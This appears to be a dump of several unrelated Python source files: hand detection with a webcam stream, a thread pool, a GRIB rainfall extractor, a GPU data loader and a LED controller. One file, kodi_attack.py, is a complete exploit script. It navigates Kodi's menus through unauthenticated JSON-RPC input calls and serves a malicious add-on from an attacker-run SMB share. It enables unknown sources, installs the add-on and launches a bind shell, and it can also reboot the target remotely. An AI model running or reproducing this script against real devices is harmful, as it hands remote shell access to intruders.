# List of the strings that are used to add the correct label to each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# Load a frozen inference graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
    # Each score represents the level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
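# Illustrative sketch (not part of the original module) showing how the
# threaded reader above is typically consumed; camera index 0 and the
# 320x240 size are arbitrary choices.
def example_stream_loop(num_frames=10):
    stream = WebcamVideoStream(src=0, width=320, height=240).start()
    try:
        for _ in range(num_frames):
            frame = stream.read()  # always the most recently grabbed frame
            if frame is None:      # camera not ready yet or unavailable
                continue
            print("frame shape: %s" % (frame.shape,))
    finally:
        stream.stop()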
|
ThreadPool.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import queue
import threading
import contextlib
import time
StopEvent = object()
class ThreadPool(object):
def __init__(self, max_num):
        self.q = queue.Queue()  # queue that holds pending tasks
        self.max_num = max_num  # maximum number of concurrent worker threads
        self.terminal = False  # if True, stop all threads and accept no new tasks
        self.generate_list = []  # threads that have been created
        self.free_list = []  # threads that are currently idle
def run(self, func, args, callback=None):
"""
线程池执行一个任务
:param func: 任务函数
:param args: 任务函数所需参数
:param callback: 任务执行失败或成功后执行的回调函数,回调函数有两个参数1、任务函数执行状态;2、任务函数返回值(默认为None,即:不执行回调函数)
:return: 如果线程池已经终止,则返回True否则None
"""
if len(self.free_list) == 0 and len(self.generate_list) < self.max_num: #无空闲线程和不超过最大线程数
self.generate_thread() # 创建线程
w = (func, args, callback,)# 保存参数为元组
self.q.put(w)# 添加到任务队列
def generate_thread(self):
"""
        Create one worker thread.
"""
t = threading.Thread(target=self.call)
t.start()
def call(self):
"""
        Loop: fetch the next task function from the queue and execute it.
        """
        current_thread = threading.current_thread()  # get the current thread object
        self.generate_list.append(current_thread)  # register it in the list of created threads
        event = self.q.get()  # fetch a task
        while event != StopEvent:  # as long as it is not the stop signal
            func, arguments, callback = event  # unpack the task
            try:
                result = func(*arguments)  # run the function and keep its result
                status = True  # the task completed normally
            except Exception as e:
                status = False  # the task failed
                result = e  # the result is the exception
                # print(e)
            if callback is not None:  # is there a callback?
                try:
                    callback(status, result)  # execute the callback
                except Exception as e:
                    pass
            if self.terminal:  # False by default; True once terminate() has been called
                event = StopEvent  # stop signal
            else:
                # self.free_list.append(current_thread)  # task finished, mark the thread as idle
                # event = self.q.get()  # fetch the next task
                # self.free_list.remove(current_thread)  # got a task, remove it from the idle list
                with self.worker_state(self.free_list, current_thread):
                    event = self.q.get()
        else:
            self.generate_list.remove(current_thread)  # received the stop signal: remove this thread from the created list
    def close(self):  # shut the worker threads down
        num = len(self.generate_list)  # total number of created threads
        while num:
            self.q.put(StopEvent)  # queue one stop signal per created thread
            num -= 1
    # terminate the threads (and clear the queue)
    def terminate(self):
        self.terminal = True  # flip the flag so workers stop after their current task
        while self.generate_list:  # while created threads are still alive
            self.q.put(StopEvent)  # send one stop signal per thread
        self.q.empty()  # intended to clear the queue (Queue.empty() only checks it)
@contextlib.contextmanager
def worker_state(self,free_list,current_thread):
free_list.append(current_thread)
try:
yield
finally:
free_list.remove(current_thread)
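# Illustrative usage (not part of the original module): run a handful of tasks
# on at most three worker threads, then shut the pool down.
def _example_pool_usage():
    def work(n):
        time.sleep(0.01)
        return n * n

    def on_done(status, result):
        # status is False and result is the exception when `work` raised
        print(status, result)

    pool = ThreadPool(3)
    for i in range(10):
        pool.run(work, (i,), callback=on_done)
    pool.close()  # queues one StopEvent per created worker thread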
|
kodi_attack.py
|
import requests
import argparse
import threading
import socket
from struct import *
import time
import sys
from impacket import smbserver
def do_input_request(ip, port, method):
url = 'http://' + ip + ':' + port + '/jsonrpc'
data = '[{"jsonrpc":"2.0","method":"' + method + '","params":[],"id":13}]'
resp = requests.post(url, data = data)
return resp.status_code == 200
def do_send_text(ip, port, text):
url = 'http://' + ip + ':' + port + '/jsonrpc'
data = '[{"jsonrpc":"2.0","method":"Input.SendText","params":{"text":"' + text + '"},"id":13}]'
resp = requests.post(url, data = data)
return resp.status_code == 200
def do_action_request(ip, port, method):
url = 'http://' + ip + ':' + port + '/jsonrpc'
data = '[{"jsonrpc":"2.0","method":"Input.ExecuteAction","params":{"action":"' + method + '"},"id":13}]'
resp = requests.post(url, data = data)
return resp.status_code == 200
##
# The SMB Server function. Runs on its own thread.
# @param lip the listening IP address
##
def smb_server(lip):
server = smbserver.SimpleSMBServer(listenAddress=lip, listenPort=445)
server.addShare('00000000', '.', '')
server.setSMBChallenge('')
server.setLogFile('/dev/null')
server.start()
if __name__ == '__main__':
top_parser = argparse.ArgumentParser(description='test')
top_parser.add_argument('--rip', action="store", dest="rip", required=True, help="The IPv4 address to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", help="The port to connect to", default="8080")
top_parser.add_argument('--lip', action="store", dest="lip", required=True, help="The local IPv4 address")
top_parser.add_argument('--reboot', action="store", dest="reboot", help="Reboot the remote target")
top_parser.add_argument('--clean', action="store", dest="clean", help="Attempt to clean up the environment")
args = top_parser.parse_args()
if args.reboot != None:
print("[+] Sending reboot request.")
url = 'http://' + args.rip + ':' + args.rport + '/jsonrpc'
data = '[{"jsonrpc":"2.0","method":"System.Reboot","params":[],"id":13}]'
resp = requests.post(url, data = data)
print("[+] Done.")
sys.exit(0)
# spin up the SMB server thread
print "[+] Spinning up the SMB Server"
smb_thread = threading.Thread(target=smb_server, args=(args.lip, ))
smb_thread.daemon = True;
smb_thread.start()
# Force return to the main page (aka login bypass)
do_input_request(args.rip, args.rport, "Input.Home")
# We're at the home screen but could have any menu item selected. Page up to reach the first item (TV shows)
do_action_request(args.rip, args.rport, "pageup")
do_action_request(args.rip, args.rport, "pageup")
# Go up one (power) and right one (settings) and hit enter
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Right")
do_input_request(args.rip, args.rport, "Input.Select")
# We're in the settings page. We could be anywhere though. Page up (Player || File Manager) and then up (File manger). Hit enter
do_action_request(args.rip, args.rport, "pageup")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Select")
# Page down to 'add source'
do_action_request(args.rip, args.rport, "pagedown")
do_input_request(args.rip, args.rport, "Input.Select")
# Cancel may or may not be selected. Try to go down two times and then back up two times to input
do_input_request(args.rip, args.rport, "Input.Down")
do_input_request(args.rip, args.rport, "Input.Down")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Select")
# Add file source pops. Hit select to add what we want [note this can go bad depending if cancel or none is selected]
time.sleep(1)
do_send_text(args.rip, args.rport, "smb://" + args.lip + "/00000000/")
time.sleep(1)
# Move to ok and hit enter
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Select")
# We just created an attacker owned source! High five!
# Back to home
do_input_request(args.rip, args.rport, "Input.Home")
# Into settings
do_input_request(args.rip, args.rport, "Input.Select")
# Into System
do_input_request(args.rip, args.rport, "Input.Down")
do_action_request(args.rip, args.rport, "pagedown")
do_input_request(args.rip, args.rport, "Input.Select")
# Here we assume "standard" layout. In basic, add-ons is the last item
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Right")
# Enable unknown sources
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Select")
# Yes we are sure
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Select")
# Back to home
do_input_request(args.rip, args.rport, "Input.Home")
# Into settings
do_input_request(args.rip, args.rport, "Input.Select")
# Back up and right to add-ons
do_action_request(args.rip, args.rport, "pageup")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Right")
do_input_request(args.rip, args.rport, "Input.Select")
# Up two to "Install from zip file" (go up since extra fields might exist)
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Select")
# our smb share "0000000" should be the first one due to alphabetical ordering (alphanum first)
do_input_request(args.rip, args.rport, "Input.Down")
do_input_request(args.rip, args.rport, "Input.Select")
# should be only one entry in our directory
do_input_request(args.rip, args.rport, "Input.Down")
do_input_request(args.rip, args.rport, "Input.Select")
print("[+] Pausing for install to take affect...")
time.sleep(5)
# execute the shell
url = 'http://' + args.rip + ':' + args.rport + '/jsonrpc'
data = '[{"jsonrpc":"2.0","method":"Addons.ExecuteAddon","params":{"addonid":"script.bind.shell.1270"},"id":10}]'
resp = requests.post(url, data = data)
if resp.status_code == 200:
        print('[+] Success!')
# return to main menu
do_input_request(args.rip, args.rport, "Input.Home")
if args.clean != None:
            print('[+] Attempting to remove the SMB source...')
# Into settings
do_input_request(args.rip, args.rport, "Input.Select")
# Right to filemanager
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Select")
# Page up to the top of the left. And right to top of the right
do_action_request(args.rip, args.rport, "pageup")
do_input_request(args.rip, args.rport, "Input.Right")
# pop up the context menu
do_input_request(args.rip, args.rport, "Input.ContextMenu")
# down two to remove source
do_input_request(args.rip, args.rport, "Input.Down")
do_input_request(args.rip, args.rport, "Input.Down")
# remove the source
do_input_request(args.rip, args.rport, "Input.Select")
time.sleep(1)
# yes, we're sure
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Select")
# move back to an exploitable state
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Home")
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Down")
else:
print('[+] Sleeping for 10 minutes before quitting.')
time.sleep(600)
else:
        print('[-] Failure! Host left in unknown state... going to sleep')
time.sleep(600)
print("[+] Done :)")
|
Rainfall_multiprocess_WEBSERVER_2020_esas.py
|
#
# Copyright 2005-2018 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities granted to it by
# virtue of its status as an intergovernmental organisation nor does it submit to any jurisdiction.
#
from __future__ import print_function
import traceback
import sys
import time
import datetime
from random import randint
from multiprocessing import Process
from threading import Thread
from eccodes import *
INPUT = '../../data/reduced_latlon_surface.grib1'
VERBOSE = 1 # verbose error reporting
missingValue = 1e+20 # A value out of range
#def example(INPUT):
#def example(INPUT,y,yarr):
def example(INPUT,OUT,w,m,y,yarr):
indexarray = yarr.split(",");
forthenameoffile = yarr.replace(",","_");
test = datetime.datetime.now();
# name = "GribIndexPoints_"+forthenameoffile+"_"+m+"_"+y+"_" +OUT+"_"+test.strftime("%d_%m_%Y_%H:%M:%S")+".csv";
# name = OUT+"_"+y+"_"+m+"_GribIndexPoints_"+forthenameoffile+"_"+test.strftime("%d_%m_%Y_%H:%M:%S")+".csv";
name = OUT+"_"+y+"_"+m+"_GribIndexPoints_"+forthenameoffile+"_started_"+test.strftime("%d_%m_%Y_%H_%M")+".csv";
# name = OUT+"_"+y+"_"+m+"_SWIMFull_started_"+test.strftime("%d_%m_%Y_%H:%M")+".csv";
f = open(INPUT, 'rb')
f2 = open('../../files/'+name, "a")
#critics ? ;)
# f2.write("index,lat,lon,value,timestamp,name,shortname,units\n")
if w=='true':
sys.stdout.write("index,lat,lon,value,timestamp,name,shortname,units\n")
f2.write("index,lat,lon,value,dataDate,dataTime,validityDate,validityTime,name,shortname,units\n")
while 1:
gid = codes_grib_new_from_file(f)
if gid is None:
break
# Set the value representing the missing value in the field.
# Choose a missingValue that does not correspond to any real value in the data array
codes_set(gid, "missingValue", missingValue)
iterid = codes_grib_iterator_new(gid, 0)
i = 0
while 1:
result = codes_grib_iterator_next(iterid)
if not result:
break
for x in indexarray:
if i==int(x): #and (codes_get(iterid,'day')==1 or codes_get(iterid,'day')==14 or codes_get(iterid,'day')==25):
[lat, lon, value] = result
# sys.stdout.write("- %d - lat=%.6e lon=%.6e value=" % (i, lat, lon))
# if value == missingValue:
# print("missing")
# else:
# print("%.6f" % value)
timestamp = ""
if codes_get(iterid, 'day') < 10:
timestamp = timestamp+"0"+str(codes_get(iterid, 'day'))
else:
timestamp = timestamp+str(codes_get(iterid, 'day'))
timestamp = timestamp+"-"+str(codes_get(iterid, 'month'))+"-"+str(codes_get(iterid, 'year'))
if codes_get(iterid, 'validityTime') == 0:
timestamp = timestamp+" 00:00:00"
elif codes_get(iterid, 'validityTime') < 1000:
eben = str(codes_get(iterid, 'validityTime'))
timestamp = timestamp+" 0"+eben[0]+":00:00"
else:
eben2 = str(codes_get(iterid, 'validityTime'))
timestamp = timestamp+" "+eben2[0]+eben2[1]+":00:00"
# print ("TIME - %s" % (timestamp))
sys.stdout.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, timestamp, codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
# f2.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, timestamp, codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
f2.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, codes_get(iterid, 'dataDate'), codes_get(iterid, 'dataTime'), codes_get(iterid, 'validityDate'), codes_get(iterid, 'validityTime'), codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
# i += 1
i += 1
codes_grib_iterator_delete(iterid)
codes_release(gid)
f.close()
def main():
try:
year=sys.argv[1]
yar=sys.argv[2]
except CodesInternalError as err:
if VERBOSE:
traceback.print_exc(file=sys.stderr)
else:
sys.stderr.write(err.msg + '\n')
return 1
if __name__ == "__main__":
# sys.exit(main())
year=sys.argv[1]
month=sys.argv[2]
yar=sys.argv[3]
if(int(month)<10):
smonth='0'+month;
else:
smonth=month;
# Thread(target = example,args=('../andrew/MERA_PRODYEAR_'+year+'_12_33_105_10_0_FC3hr',year,yar)).start()
# Thread(target = example,args=('../andrew/MERA_PRODYEAR_'+str(int(year)+1)+'_01_33_105_10_0_FC3hr',str(int(year)+1),yar)).start()
# example('MERA_PRODYEAR_2016_12_61_105_0_4_FC33hr','TotalPrecip')
Process(target = example,args=('/var/www/html/mera/map/backup/thread/Rainfall/MERA_PRODYEAR_'+year+'_'+smonth+'_61_105_0_4_FC33hr','TotalPrecip','true',smonth,year,yar)).start()
|
backend.py
|
#
# Copyright (c) 2020, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import queue
import threading
from collections import OrderedDict
import cudf
import cupy as cp
from cudf.utils.dtypes import is_list_dtype
from nvtabular.io.shuffle import _shuffle_df
from nvtabular.ops import _get_embedding_order
def _num_steps(num_samples, step_size):
return (num_samples - 1) // step_size + 1
class ChunkQueue:
"""This class takes partitions (parts) from an NVTabular dataset
and concatenates them into a cudf dataframe "chunk". This chunk
is subsequently transformed into its tensor representation using
the iterator's transform.
Parameters
-----------
qsize: int
Max number of elements to hold in the buffer at once
num_parts : int
number of partitions from the iterator, an NVTabular Dataset to concatenate into a "chunk"
shuffle : bool
enable/disable chunk-level shuffling
put_wait: float
amount of timeout to wait for a full queue to open up
before checking for errors and trying again
"""
def __init__(self, qsize, num_parts=1, shuffle=False, put_wait=1e-6):
self.num_parts = num_parts
self.shuffle = shuffle
self.put_wait = put_wait
self.q_out = queue.Queue(qsize)
self._stop_event = threading.Event()
@property
def stopped(self):
return self._stop_event.is_set()
@property
def empty(self):
return self.q_out.empty()
def get(self):
return self.q_out.get()
def put(self, packet):
while True:
if self.stopped:
return True
try:
self.q_out.put(packet, timeout=self.put_wait)
return False
except queue.Full:
continue
def batch(self, itr):
"""
        iterates through gpu_mem_frac-sized chunks of the dataset
        and concatenates every `num_parts` of them.
"""
current = []
while True:
try:
value = next(itr)
except StopIteration:
if len(current) > 0:
yield current
break
current.append(value)
if len(current) == self.num_parts:
yield current
current = []
def load_chunks(self, dev, dataloader):
try:
indices = dataloader._gather_indices_for_dev(dev)
itr = iter(dataloader.data.to_iter(indices=indices))
with dataloader._get_device_ctx(dev):
spill = None
for chunks in self.batch(itr):
if self.stopped:
return
if spill and not spill.empty:
chunks.insert(0, spill)
chunks = cudf.core.reshape.concat(chunks)
chunks.reset_index(drop=True, inplace=True)
chunks, spill = self.get_batch_div_chunk(chunks, dataloader.batch_size)
if self.shuffle:
_shuffle_df(chunks)
if len(chunks) > 0:
chunks = dataloader.make_tensors(chunks, dataloader._use_nnz)
# put returns True if buffer is stopped before
# packet can be put in queue. Keeps us from
# freezing on a put on a full queue
if self.put(chunks):
return
chunks = None
                # take care of the final batch, which is smaller than batch_size
if spill is not None and not spill.empty:
spill = dataloader.make_tensors(spill, dataloader._use_nnz)
self.put(spill)
except Exception as e:
self.put(e)
# For when an iterator is stopped before iteration is complete.
def stop(self):
self._stop_event.set()
# TODO: should we be clearing? I can imagine a world where
# you want the thread to stop but still want to grab
# data out of the buffer
self.q_out.queue.clear()
def start(self):
self._stop_event.clear()
def get_batch_div_chunk(self, chunks, batch_size):
# TODO: is there a way to do this using cupy?
spill_idx = int(chunks.shape[0] / batch_size) * batch_size
spill = cudf.DataFrame(chunks.iloc[spill_idx:])
chunks = cudf.DataFrame(chunks.iloc[:spill_idx])
if not chunks.empty:
chunks.reset_index(drop=True, inplace=True)
if not spill.empty:
spill.reset_index(drop=True, inplace=True)
return chunks, spill
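# A minimal sketch (not part of the original module) of the put()/stop()
# contract used by load_chunks() above: put() returns True once stop() has
# been called, which is how the producer thread knows to exit early.
def _chunk_queue_stop_example():
    q = ChunkQueue(qsize=1)
    assert q.put("chunk-0") is False  # fits into the buffer
    q.stop()                          # ask producers/consumers to wind down
    assert q.put("chunk-1") is True   # rejected: the queue has been stopped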
# TODO: implement as metaclass and assign methods to children
# to avoid having to do Dataset.<method> calls?
class DataLoader:
_use_nnz = False
def __init__(
self,
dataset,
cat_names,
cont_names,
label_names,
batch_size,
shuffle,
parts_per_chunk=1,
devices=None,
):
self.data = dataset
self.indices = cp.arange(dataset.to_ddf().npartitions)
devices = devices or [0]
self.cat_names = cat_names or []
self.cont_names = cont_names or []
self.label_names = label_names
self.batch_size = batch_size
self.shuffle = shuffle
self.devices = devices
self.num_rows_processed = 0
self._buff = ChunkQueue(len(devices), num_parts=parts_per_chunk, shuffle=shuffle)
self._batch_itr = None
self._workers = None
def __len__(self):
return _num_steps(self.data.num_rows, self.batch_size)
@property
def _working(self):
if self._workers is not None:
return any([t.is_alive() for t in self._workers])
return False
def stop(self):
# TODO: raise warning or even error if condition
# isn't met?
if self._workers is not None and self._working:
if not self._buff.stopped:
self._buff.stop()
for t in self._workers:
t.join()
self._buff.q_out.queue.clear()
self._batch_itr = None
def _gather_indices_for_dev(self, dev):
per_worker = _num_steps(len(self.indices), len(self.devices))
worker_id = self.devices.index(dev)
start = worker_id * per_worker
return self.indices[start : start + per_worker].tolist()
def __iter__(self):
self.stop()
self.num_rows_processed = 0
if self._buff.stopped:
self._buff.start()
# shuffle partition indices to bring disparate
# parts of the dataset "close" to one another
if self.shuffle:
cp.random.shuffle(self.indices)
# build and start new threads for loading and
# concatenating data
self._workers = []
for dev in self.devices:
t = threading.Thread(target=self._buff.load_chunks, args=(dev, self))
t.daemon = True
t.start()
self._workers.append(t)
return self
def __next__(self):
return self._get_next_batch()
def _fetch_chunk(self):
chunks = self._buff.get()
if isinstance(chunks, Exception):
self.stop()
raise chunks
self._batch_itr = iter(chunks)
def _get_next_batch(self):
"""
adding this cheap shim so that we can call this
step without it getting overridden by the
framework-specific parent class's `__next__` method.
TODO: can this be better solved with a metaclass
implementation? My gut is that we don't actually
necessarily *want*, in general, to be overriding
__next__ and __iter__ methods
"""
# we've never initialized, do that now
# need this because tf.keras.Model.fit will
# call next() cold
if self._workers is None:
DataLoader.__iter__(self)
# get the first chunks
if self._batch_itr is None:
self._fetch_chunk()
# try to iterate through existing batches
try:
batch = next(self._batch_itr)
except StopIteration:
# anticipate any more chunks getting created
# if not, raise the StopIteration
if not self._working and self._buff.empty:
self._workers = None
self._batch_itr = None
raise StopIteration
# otherwise get the next chunks and return
# the first batch
self._fetch_chunk()
batch = next(self._batch_itr)
# if batch[0] is empty but other exist
for sub in batch:
if sub is not None and len(sub) > 0:
self.num_rows_processed += len(sub)
break
return batch
def make_tensors(self, gdf, use_nnz=False):
split_idx = self._get_segment_lengths(len(gdf))
# map from big chunk to framework-specific tensors
chunks = self._create_tensors(gdf)
# if we have any offsets, calculate nnzs up front
if len(chunks) == 4:
offsets = chunks[-1]
if use_nnz:
nnzs = offsets[1:] - offsets[:-1]
chunks = chunks[:-1]
# split them into batches and map to the framework-specific output format
batches = [[] for _ in range(len(split_idx))]
offset_idx = 0
for chunk in chunks:
lists = None
if isinstance(chunk, tuple):
chunk, lists = chunk
if len(split_idx) > 1 and chunk is not None:
chunk = self._split_fn(chunk, split_idx)
else:
chunk = [chunk for _ in split_idx]
if lists is not None:
num_list_columns = len(lists)
# grab the set of offsets and nnzs corresponding to
# the list columns from this chunk
chunk_offsets = offsets[:, offset_idx : offset_idx + num_list_columns]
if use_nnz:
chunk_nnzs = nnzs[:, offset_idx : offset_idx + num_list_columns]
offset_idx += num_list_columns
# split them into batches, including an extra 1 on the offsets
# so we know how long the very last element is
batch_offsets = self._split_fn(chunk_offsets, split_idx + [1])
if use_nnz and len(split_idx) > 1:
batch_nnzs = self._split_fn(chunk_nnzs, split_idx)
elif use_nnz:
batch_nnzs = [chunk_nnzs]
else:
batch_nnzs = [None] * (len(batch_offsets) - 1)
# group all these indices together and iterate through
# them in batches to grab the proper elements from each
# values tensor
chunk = zip(chunk, batch_offsets[:-1], batch_offsets[1:], batch_nnzs)
for n, c in enumerate(chunk):
if isinstance(c, tuple):
c, off0s, off1s, _nnzs = c
offsets_split_idx = [1 for _ in range(num_list_columns)]
off0s = self._split_fn(off0s, offsets_split_idx, axis=1)
off1s = self._split_fn(off1s, offsets_split_idx, axis=1)
if use_nnz:
_nnzs = self._split_fn(_nnzs, offsets_split_idx, axis=1)
# TODO: does this need to be ordereddict?
batch_lists = {}
for k, (column_name, values) in enumerate(lists.items()):
off0, off1 = off0s[k], off1s[k]
if use_nnz:
nnz = _nnzs[k]
# need to grab scalars for TF case
if len(off0.shape) == 1:
start, stop = off0[0], off1[0]
elif len(off0.shape) == 2:
start, stop = off0[0, 0], off1[0, 0]
else:
print(off0, off1)
raise ValueError
value = values[start:stop]
index = off0 - start if not use_nnz else nnz
batch_lists[column_name] = (value, index)
c = (c, batch_lists)
batches[n].append(c)
return [self._handle_tensors(*batch) for batch in batches]
def _get_segment_lengths(self, num_samples):
"""
Helper function to build indices to pass
to <torch|tf>.split functions for breaking
up into batches
"""
num_full_batches = _num_steps(num_samples, self.batch_size) - 1
idx = [self.batch_size for _ in range(num_full_batches)]
idx.append(num_samples - num_full_batches * self.batch_size)
return idx
def _to_tensor(self, gdf, dtype=None):
"""
One of the mandatory functions a child class needs
to implement. Maps from a cudf DataFrame to a
tensor in the appropriate library, with an optional
dtype kwarg to do explicit casting if need be
"""
raise NotImplementedError
def _get_device_ctx(self, dev):
"""
One of the mandatory functions a child class needs
to implement. Maps from a GPU index to a framework
context object for placing tensors on specific GPUs
"""
raise NotImplementedError
def _split_fn(self, tensor, idx):
raise NotImplementedError
@property
def _LONG_DTYPE(self):
raise NotImplementedError
@property
def _FLOAT32_DTYPE(self):
raise NotImplementedError
def _separate_list_columns(self, gdf):
lists, scalars = [], []
for col in gdf.columns:
if is_list_dtype(gdf[col]):
lists.append(col)
else:
scalars.append(col)
return _get_embedding_order(scalars), _get_embedding_order(lists)
def _create_tensors(self, gdf):
"""
Breaks a dataframe down into the relevant
categorical, continuous, and label tensors.
        Can be overridden.
"""
column_groups = (self.cat_names, self.cont_names, self.label_names)
dtypes = (self._LONG_DTYPE, self._FLOAT32_DTYPE, self._FLOAT32_DTYPE)
tensors = []
offsets = cudf.DataFrame()
for column_names, dtype in zip(column_groups, dtypes):
if len(column_names) == 0:
tensors.append(None)
continue
gdf_i = gdf[column_names]
gdf.drop(columns=column_names, inplace=True)
scalars, lists = self._separate_list_columns(gdf_i)
x = None
if scalars:
x = self._to_tensor(gdf_i[scalars], dtype)
if lists:
list_tensors = OrderedDict()
for column_name in lists:
column = gdf_i.pop(column_name)
leaves = column.list.leaves
list_tensors[column_name] = self._to_tensor(leaves, dtype)
offsets[column_name] = column._column.offsets
x = x, list_tensors
tensors.append(x)
if not offsets.empty:
offsets_tensor = self._to_tensor(offsets, self._LONG_DTYPE)
if len(offsets_tensor.shape) == 1:
offsets_tensor = offsets_tensor[:, None]
tensors.append(offsets_tensor)
del gdf, offsets
return tensors
def _handle_tensors(self, cats, conts, labels):
return cats, conts, labels
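# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): the minimal set of
# hooks a framework-specific child class is expected to provide. The torch
# calls below are one possible choice, and the to_pandas() round trip is a
# deliberate simplification -- a real backend would keep tensors on the GPU.
# The import happens lazily so this sketch adds no hard torch dependency.
# ---------------------------------------------------------------------------
def _make_torch_loader_sketch():
    import torch

    class TorchDataLoaderSketch(DataLoader):
        _LONG_DTYPE = torch.long
        _FLOAT32_DTYPE = torch.float32

        def _to_tensor(self, gdf, dtype=None):
            # Simplified host round trip: cudf -> pandas -> numpy -> torch.
            return torch.as_tensor(gdf.to_pandas().values, dtype=dtype)

        def _split_fn(self, tensor, idx, axis=0):
            # idx is a list of batch sizes produced by _get_segment_lengths
            return torch.split(tensor, idx, dim=axis)

        def _get_device_ctx(self, dev):
            return torch.cuda.device(dev)

    return TorchDataLoaderSketch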
|
leds_controller.py
|
from server.utils import settings_utils
from server.hw_controller.leds.leds_driver import LedsDriver
from threading import Thread, Lock
class LedsController:
def __init__(self, app):
self.app = app
settings = settings_utils.load_settings()
self.dimensions = None
self.update_settings(settings)
self._should_update = False
self.mutex = Lock()
# may have problems with the leds controller if self.driver.deinit or self.stop is not called on app shutdown
def start(self):
        if self.driver is not None:
self._running = True
self._th = Thread(target = self._thf, daemon=True)
self._th.name = "leds_controller"
self._th.start()
def stop(self):
self._running = False
def _thf(self):
self.app.logger.info("Leds controller started")
while(self._running):
with self.mutex:
if (self._should_update):
self.driver.fill(self._color)
self._should_update = False
self.app.logger.error("test")
self.driver.deinit()
# sets a fixed color for the leds
def set_color(self, color):
with self.mutex:
self._color = color
self._should_update = True
def start_animation(self, animation):
# TODO add animations picker:
# may add animations like:
# * a rainbow color moving around (may choose speed, saturation, direction, multiple rainbows etc)
